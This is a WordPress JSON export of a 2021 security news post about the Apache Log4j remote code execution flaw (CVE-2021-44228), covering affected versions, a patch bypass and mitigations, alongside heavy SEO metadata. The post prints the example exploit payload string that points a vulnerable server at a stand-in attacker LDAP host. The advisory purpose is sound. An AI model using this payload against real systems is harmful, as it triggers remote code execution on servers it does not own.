{"id":44375,"date":"2021-12-10T14:17:35","date_gmt":"2021-12-10T14:17:35","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/32902\/Worst-Apache-Log4j-RCE-Dropped-On-Internet.html"},"modified":"2021-12-10T14:17:35","modified_gmt":"2021-12-10T14:17:35","slug":"worst-apache-log4j-rce-dropped-on-internet","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/","title":{"rendered":"Worst Apache Log4j RCE Dropped On Internet"},"content":{"rendered":"<p><b><span>Update 10-12-21 at 09:30AM IST<\/span><\/b><\/p>\n<div readability=\"10.521739130435\">On the Mitigation section of this post, we have recommended all users to upgrade the log4j version to the latest one which was&nbsp;log4j-2.15.0-rc1 (at writing the original post). But here is another bad news, security mates have found a way to bypass the patch on&nbsp;log4j-2.15.0-rc1. So we <b>strongly recommend to the upgrade the&nbsp;apache log4j2 version to <a href=\"http:\/\/log4j-2.15.0-rc2\" rel=\"nofollow noopener\" target=\"_blank\">log4j-2.15.0-rc2<\/a><\/b>.<\/div>\n<p>Furthermore, the leader of knownsec 404 team (ZoomEye &amp; SeeBug) &#8216;Heige&#8217; have also recommend to set <i>log4j2.formatMsgNoLookups<\/i> to <b>true<\/b>.<\/p>\n<p>Initially, the vulnerability was new so, there was no CVE to track it. But now we have&nbsp;<b>CVE-2021-44228<\/b> for&nbsp;Remote code injection in Log4j. As the PoC has already been released and it is very to exploit the vulnerability. The payload to exploit the vulnerability is&nbsp;<\/p>\n<div readability=\"9\">\n<pre><code>${jndi:ldap:\/\/attacker.com\/a} <\/code><\/pre>\n<p> (where attacker.com is an attacker-controlled server)<\/p><\/div>\n<hr>\n<p>A couple of hours ago, a remote code execution vulnerability in Apache Log4j2 appeared on the Internet. An attacker can use this vulnerability to construct a special data request packet, which eventually triggers remote code execution. Due to the wide range of impact of this vulnerability, users are advised to investigate related vulnerabilities in a timely manner.&nbsp;<\/p>\n<p>After analysis and confirmation by the White Hat Security Research Institute, there are currently many popular systems on the market that are affected. Almost very tech giants is the victim of this Log4j Remote Code Execution vulnerability.<\/p>\n<h3>Vulnerability description<\/h3>\n<p>Apache Log4j2 is a Java-based logging tool. This tool rewrites the Log4j framework and introduces a lot of rich features. The log framework is widely used in business system development to record log information.<\/p>\n<p>In most cases, developers may write error messages caused by user input into the log. Attackers can use this feature to construct special data request packets through this vulnerability, and ultimately trigger remote code execution.<\/p>\n<p>On November 24, 2021, the Alibaba Cloud security team officially reported the Apache Log4j2 remote code execution vulnerability to Apache. Because some functions of Apache Log4j2 have recursive analysis functions, attackers can directly construct malicious requests to trigger remote code execution vulnerabilities.<\/p>\n<p>Vulnerability exploitation does not require special configuration. After verification by the Alibaba Cloud security team, <b>Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc. are all affected.&nbsp;<\/b><\/p>\n<p>Alibaba Cloud Emergency Response Center reminds Apache Log4j2 users to take security measures as soon as possible to prevent vulnerability attacks.<\/p>\n<p>Level of the vulnerability: Serious (Critical)<\/p>\n<h3>Affected Version<\/h3>\n<p><b>2.0 &lt;= Apache log4j2 &lt;= 2.14.1<\/b><\/p>\n<p>Impact judgment method: Users only need to check whether the Java application has introduced two jars, log4j-api and log4j-core. If there is application usage, it is likely to be affected.<\/p>\n<div class=\"separator\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" data-original-height=\"533\" data-original-width=\"1080\" height=\"316\" src=\"https:\/\/1.bp.blogspot.com\/-7IH546jNb7o\/YbJaiK8n_xI\/AAAAAAAANoo\/omO8dznPVAUAQsSFDGkmKK0PJw3FRmjzwCNcBGAsYHQ\/w640-h316\/Apache%2BLog4j2__vulnerability.webp\" width=\"640\"><\/div>\n<p><\/p>\n<h3>Mitigation for Log4j Vulnerability<\/h3>\n<p>At present, Vulfocus has integrated the Log4j2 environment. You can start the environment test through the following link:<\/p>\n<p>http:\/\/vulfocus.fofa.so\/#\/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c<\/p>\n<p>We highly recommend to use <a href=\"https:\/\/github.com\/apache\/logging-log4j2\/releases\/tag\/log4j-2.15.0-rc1\" rel=\"nofollow noopener\" target=\"_blank\">latest version<\/a> of Log4j2, and also upgrade the applications and components that are known to be affected, such as srping-boot-strater-log4j2\/Apache Solr\/Apache Flink\/Apache Druid.<\/p>\n<p><b>Update:&nbsp;<\/b><\/p>\n<p>What can be worse than this? Just some hours past and PoC for Log4j Vulnerability was released on the internet.<\/p>\n<div class=\"separator\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" data-original-height=\"763\" data-original-width=\"1024\" height=\"476\" src=\"https:\/\/1.bp.blogspot.com\/-ApIO6lkeRik\/YbJdZ-hBWuI\/AAAAAAAANow\/ddwRNughVPQPsPAt-9eovM1Pg-peMq93QCNcBGAsYHQ\/w640-h476\/%2Bpoc%2Bfor%2Blog4j%2BVulnerability.webp\" width=\"640\"><\/div>\n<p>Check <a href=\"https:\/\/bug.cyberkendra.com\/2021\/12\/09\/log4j-remote-code-execution\/\" target=\"_blank\" rel=\"noopener\">PoC here<\/a>.<\/p>\n<p>READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/32902\/Worst-Apache-Log4j-RCE-Dropped-On-Internet.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":44376,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[2291],"class_list":["post-44375","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineflawapache"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-10T14:17:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-7IH546jNb7o\/YbJaiK8n_xI\/AAAAAAAANoo\/omO8dznPVAUAQsSFDGkmKK0PJw3FRmjzwCNcBGAsYHQ\/w640-h316\/Apache%2BLog4j2__vulnerability.webp\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Worst Apache Log4j RCE Dropped On Internet\",\"datePublished\":\"2021-12-10T14:17:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/\"},\"wordCount\":574,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/worst-apache-log4j-rce-dropped-on-internet.jpg\",\"keywords\":[\"headline,flaw,apache\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/\",\"name\":\"Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/worst-apache-log4j-rce-dropped-on-internet.jpg\",\"datePublished\":\"2021-12-10T14:17:35+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/worst-apache-log4j-rce-dropped-on-internet.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/worst-apache-log4j-rce-dropped-on-internet.jpg\",\"width\":640,\"height\":316},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/worst-apache-log4j-rce-dropped-on-internet\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,flaw,apache\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineflawapache\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Worst Apache Log4j RCE Dropped On Internet\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/","og_locale":"en_US","og_type":"article","og_title":"Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-12-10T14:17:35+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-7IH546jNb7o\/YbJaiK8n_xI\/AAAAAAAANoo\/omO8dznPVAUAQsSFDGkmKK0PJw3FRmjzwCNcBGAsYHQ\/w640-h316\/Apache%2BLog4j2__vulnerability.webp","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Worst Apache Log4j RCE Dropped On Internet","datePublished":"2021-12-10T14:17:35+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/"},"wordCount":574,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/worst-apache-log4j-rce-dropped-on-internet.jpg","keywords":["headline,flaw,apache"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/","url":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/","name":"Worst Apache Log4j RCE Dropped On Internet 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/worst-apache-log4j-rce-dropped-on-internet.jpg","datePublished":"2021-12-10T14:17:35+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/worst-apache-log4j-rce-dropped-on-internet.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/12\/worst-apache-log4j-rce-dropped-on-internet.jpg","width":640,"height":316},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/worst-apache-log4j-rce-dropped-on-internet\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,flaw,apache","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineflawapache\/"},{"@type":"ListItem","position":3,"name":"Worst Apache Log4j RCE Dropped On Internet"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44375"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44375\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/44376"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}